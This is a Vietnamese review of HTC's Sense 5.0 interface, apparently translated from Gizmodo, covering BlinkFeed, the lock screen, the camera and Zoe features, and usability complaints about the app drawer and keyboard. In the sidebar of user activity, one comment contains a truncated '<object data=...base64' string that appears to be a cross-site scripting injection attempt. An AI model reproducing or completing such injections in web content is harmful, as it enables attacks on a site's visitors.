Đánh giá giao diện Sense 5.0

Đăng bởi :

 

 Giao diện Sense đã luôn là yếu tố được nhắc đến nhiều cùng với các sản phẩm của HTC. Bộ giao diện bắt mắt và nhiều màu sắc tưởng chừng sẽ đem lại cho các sản phẩm phần cứng không có gì để chê của HTC những dấu ấn tốt đẹp trong lòng người dùng nhưng hóa ra lại là một chiếc “cùm” đối với thiết bị làm cho nó trở lên lag và hao pin. Sau nhiều năm biến đổi , Sense 4.0 đã trở nên sáng sủa và có thể phục vụ người dùng tốt hơn một chút. Giờ chúng ta đã biết Sense 5.0 là một sự tách biệt hoàn toàn với các phiên bản trước đó, nó là thành quả sau những nỗ lực sáng tạo của nhóm thiết kế. Nhưng liệu khác biệt hơn có đồng nghĩa với tốt hơn, chúng ta hãy cùng tìm hiểu.

Khởi Đầu

Điều đầu tiên bạn sẽ chú ý khi nhìn vào giao diện này là màn hình nền được HTC gọi là BlinkFeed. Trong những bước phát triển trước của Sense, tất cả các trang đầu trên màn hình nền đều giống nhau, chúng chỉ là màn hình máy bàn được thay đổi chút xíu. Còn BlinkFeed thì rất khác. BlinkFeed gần như là các Live Tile của Windows Phone lai với các tin nhắn RSS. Bạn có thể kiểm soát được nguồn tin mà BlinkFeed sẽ đưa tới cho bạn và nó giúp bạn thấy được mọi thông tin mới nhất chỉ trong một cái nhìn. Nó cũng được gom vào cả những thông tin cập nhật của hồ sơ của bạn trên mạng xã hội khiến bạn có thể like các bức ảnh và status của những người thân thiết trên Facebook. Những thông tin đó được trải ra trước mắt các bạn theo một cách khá đẹp mắt và tiện lợi cho việc cuộn trang nhưng điều không tốt là nó lại ở màn hình nền. Hầu hết các biên tập viên của trang Gizmodo khi dùng thử giao diện này đều cảm thấy phát điên vì nó trì hoãn việc khám phá các tính năng khác của sản phẩm này. Cuối cùng thì may mắn thay họ có thể chuyển sang sử dụng màn hình thông thường của Android một cách dễ dàng. Khi ở chế độ này thì bạn có thể chuyển qua BlinkFeed khi nào bạn muốn và không làm bạn phân tán khi đang muốn tập trung vào việc muốn làm với các ứng dụng.

Mặt tốtMàn hình khóa cũng có thể được điều chỉnh. Bạn có thể đặt nó ở chế độ Productivity nhằm hiển thị các tin nhắn chưa đọc, các email, các cuộc hẹn sắp diễn ra. Hoặc bạn có thể chuyển sang chế độ Phôt Album giúp việc cuộn qua các bức ảnh trong tất cả mọi album ảnh mà bạn đã chọn trở nên dễ dàng. Bạn cũng có thể khiến màn hình hiện lên các tác phẩm âm nhạc có trên máy với hoặc chỉ một wallpaper đơn giản. Nếu những điều này đều làm bạn không thích thì bạn cũng có thể không dùng đến màn hình khóa. Và nếu bạn có dùng đến màn hình khóa lock screen thì sẽ luôn luôn có chiếc đồng hồ mới của HTC và widget thời tiết nằm trên đầu của mục app drawer. Chiếc đồng hồ này đã được đơn giản hóa đi nhiều so với chiếc đồng hồ widget được cài đặt sẵn trước đây. Chiếc đồng hồ này trông gọn gàng hơn, dễ đọc hơn và hòa nhập tốt hơn vào hệ điều hành Android Jelly Bean. Đây là một nhân tố mới đang hoan ngênh trên giao diện Sense 5.0.  

Ứng dụng camera mới được cập nhật của HTC thực sự đặc biệt, thực sự dễ dùng. Ứng dụng trên Sense 4.0 cũng đã tốt nhưng giờ lại thêm phần rõ ràng và tốn ít diện tích màn hình hơn khiến bạn có thể qua sát cảnh vật đang định chụp một cách tốt hơn. Chuyển đổi giữa việc bật và tắt đèn flash, ghi hình hay chụp ảnh và đưa thêm vào các bộ lọc hiệu ứng chỉ đều nằm trong một nút. Sau khi chạm vào nút thiết lập đó thì bạn có thể có hàng loạt những điều chỉnh từ độ phân giải, cân bằng trắng, độ tương phản, độ phơi sáng và thiết lập chuẩn ISO. Phần thiết lập đó cũng là nơi bạn sẽ tìm thấy các cài đặt cho việc bấm giờ tự động cho thời gian quay phim hoặc chụp ảnh, bật tắt tính năng HDR(cả chụp ảnh và video) cùng với lựa chọn chụp ảnh toàn cảnh panorama.

Cũng có một tính năng mới khác trên Sense 5.0 được gọi là Zoe dùng để lưu lại video 3 giây(1 giây trước khi chụp và 2 giây sau đó) để bạn có thể xem được dưới dạng ảnh tĩnh. Các video đó sẽ được chơi trực tiếp trong gallery của bạn và chiếc điện thoại cũng có thể giúp bạn dàn dựng những seri ảnh chụp và video trong một sự kiện thành một cuốn phim tư liệu nhỏ có kèm theo nhạc nền hẳn hoi. Đó là một tính năng giải trí thú vị và đầy tính bất ngờ. Tin tốt lành hơn là những điều chỉnh thêm vào này không khiến chiếc điện thoại này giảm tốc độ một chút nào. Độ lag ở đây bằng không, bạn có thể chuyển qua các ứng dụng một cách nhẹ nhàng và chụp ảnh nhanh chóng. Một vài Widget cũng được cải thiện đó là về các hồ sơ người dùng, việc chuyển từ chế độ chuông sang chế độ rung hoặc im lặng một cách cực kì đơn giản. Dù vậy Sense 5.0 cũng vẫn có những lỗi như trên các phiển bản trước.

Mặt xấu 

Việc điều chỉnh màn hình nền tưởng như rắc rối hơn một chút do biên tập viên đã thao tác không chính xác với App Drawer khiến anh ta không thể thêm các widget một cách nhanh chóng như trước kia. Vậy nên anh ta nghĩ rằng để thêm widget cần phải qua nhiều thao tác phức tạp như ấn vào một khoảng trống trên màn hình và giữ ngón tay ở đó trong một thời gian lâu để hệ điều hành đưa bạn đến chế độ điều chỉnh rồi mới quay trở lại búng vào ứng dụng một lần nữa mới hoàn tất việc thêm ứng dụng này vào danh sách các widget trên màn hình. Thế nhưng không phải như vậy, vẫn có một cách khác để người dùng có thể thêm vào widget trên màn hình một cách nhanh chóng. Bạn có thể kéo các ứng dụng trực tiếp từ phần app drawer vào màn hình bằng cách giữ tay vào ứng dụng một thời gian rồi kéo vào nút Shortcut, giữ nó ở đó một lúc và sau đó nó sẽ hiện lên màn hình. Tuy cách này không được trực quan và dễ đoán cho lắm nhưng nó vẫn khiến bạn có thể sử dụng dễ dàng nếu biết đến.


Vì một lí do nào đó mà cấu hình mặc định của app drawer là 3x4 cột và các biểu tượng được sắp đặt một cách khá lung tung. Điều này khiến không chỉ có nhiều diện tích bị bỏ phí mà còn khiến bạn khó có thể tìm thấy thứ mình cần. Nhưng bạn có thể sửa chữa điều này bằng cách chọn kích cỡ cột 4x5 và lựa chọn sắp xếp theo alphabet, thật tiếc là những điều chỉnh này không được chọn làm mặc định. Cũng tương tự là việc cuộn dọc trong  app drawer giống như trên Android 4.0. Nếu bạn cuộn từ bên này sang bên kia trên màn hình máy bàn thì bạn cũng sẽ thích điều tượng tự trên app drawer hơn là việc cuộn dọc như hiện nay. Một điều trong cách sắp xếp này mà không biết sẽ làm bạn thích hay ghét là việc nếu bạn vừa mới mở app drwer trước khi vào một ứng dụng khác hoặc khóa chiếc điện thoại thì khi ấn vào nút home bạn sẽ quay trở lại đúng phần app drawer đó. Hay nói cách khác, app drawer đã thay thế cho màn hình Android , và khiến sản phẩm giống iOS hơn. Bạn cũng có thể ấn home một lần nữa để vào lại màn hình nền bình thường.

Một điều cũng chẳng mấy dễ chịu gì trên Sense mới là bàn phím ảo. Nó không tệ hơn so với phiên bản 4.0, nhưng cũng không tốt hơn một cách rõ rệt. Bàn phím này có tính năng tự động sửa chữ và gợi ý từ nhưng nếu bạn click một trong các lựa chọn đó thì nó lại không tự động thêm vào các dấu cách, đảm bảo bạn sẽ mắc lỗi vì điền vào hai từ liền nhau nếu đã quen dùng tính năng gợi ý từ trên các sản phẩm khác. Điều này cũng không ảnh hưởng tới tổng thể lắm vì bạn có thể tải về sử dụng các ứng dụng bàn phím khác trên Google Play để thay thế nhưng sẽ là điều chẳng mấy hay ho cho những người chưa biết đến các ứng dụng đó. HTC đã mang lại những thứ tệ hơn so với những gì mà nền tảng Android cơ bản đã mang lại.

Tổng quan

HTC Sense 5.0 rõ ràng đã cũng cấp một trải nghiệm người dùng hấp dẫn và chắc chắn nó sẽ khiến nhiều người phải thốt lên vì thích thú, đặc biệt là những ai đã từng ngưỡng mộ Windows Phone. Tuy có những yếu tố mới trên Sense 5.0 khiến người ta thích thú nhưng cũng có những yếu tố thiếu sự trực quan khiến người ta có cảm giác rằng giao diện này như tụt lùi đi. Tóm lại những yếu tố này có thể không khiến bạn cảm thấy chán ghét sản phẩm những cũng không đủ độ hoàn thiện để bạn có thể sử dụng một cách nhanh chóng sau khi sở hữu mà không phải mất một thời gian làm quen và điều chỉnh.

Thêm Clip về Sense 5.0:

 

 

Theo : Gizmodo

Có 0 Bình luận Thảo luận với cộng đồng về thông tin này Đăng nhập để gửi bình luận
Kết nối Facebook

Tin tức liên quan

Bản tin

phu7898 avatar

quá hay

Bình luận của phu7898 

Vào lúc 11:38 am 19/08/2015

dnythivs avatar

<object data="data:text/html;base64,PCEtLU ...

Bình luận của dnythivs 

Vào lúc 11:15 am 16/08/2015

phu7898 avatar

phu7898 đã đánh giá Samsung Galaxy S Duos

Đánh giá chi tiết Samsung Galaxy S Duos

Vào lúc 03:38 pm 07/08/2015

dnythivs avatar

Chào mừng thành viên mới: dnythivs

Vào lúc 08:13 pm 05/08/2015

xvcwekaasoerzty avatar

Chào mừng thành viên mới: xvcwekaasoerzty

Vào lúc 08:00 pm 26/11/2014

kqappqnsvs avatar

Chào mừng thành viên mới: kqappqnsvs

Vào lúc 02:38 am 11/11/2014

oahsjrqunk avatar

Chào mừng thành viên mới: oahsjrqunk

Vào lúc 03:31 am 10/10/2014

trungvux avatar

trungvux đã đánh giá HTC One

Đánh giá HTC One

Vào lúc 06:37 am 28/04/2014

trungvux avatar

trungvux đã đánh giá Nokia Lumia 820

Đánh giá Nokia Lumia 820

Vào lúc 06:28 am 28/04/2014

trungvux avatar

trungvux đã đánh giá BlackBerry Z10

Đánh giá BlackBerry Z10

Vào lúc 09:06 pm 27/04/2014

trungvux avatar

trungvux đã đánh giá Microsoft Surface Pro

Microsoft Surface Pro

Vào lúc 09:04 pm 27/04/2014

trungvux avatar

trungvux đã đánh giá LG Optimus G Pro

Đánh giá LG Optimus G Pro

Vào lúc 09:00 pm 27/04/2014

trungvux avatar

trungvux đã đánh giá Asus Fonepad

Đánh giá Asus FonePad - 'điện thoại' 7 inch giá rẻ

Vào lúc 08:54 pm 27/04/2014

trungvux avatar

trungvux đã đánh giá Asus Fonepad

Đánh giá Asus FonePad - 'điện thoại' 7 inch giá rẻ

Vào lúc 08:48 pm 27/04/2014

trungvux avatar

trungvux đã đánh giá Asus Fonepad

Đánh giá Asus FonePad - 'điện thoại' 7 inch giá rẻ

Vào lúc 08:48 pm 27/04/2014

Tin xem nhiều

Sản phẩm hot

Đánh giá chi tiết Samsung Galaxy S Duos

Samsung Galaxy S Duos +500

Đánh giá
So sánh
4.0
Đánh giá máy ảnh

Olympus Stylus Tough TG-2 iHS +500

Đánh giá
So sánh
4.0
Đánh giá HTC One

HTC One +500

Đánh giá
So sánh
5.0
Đánh giá Sony Xperia SL

Sony Xperia SL +500

Đánh giá
So sánh
5.0
Samsung Galaxy S4

Samsung Galaxy S4 +500

Đánh giá
So sánh
4.5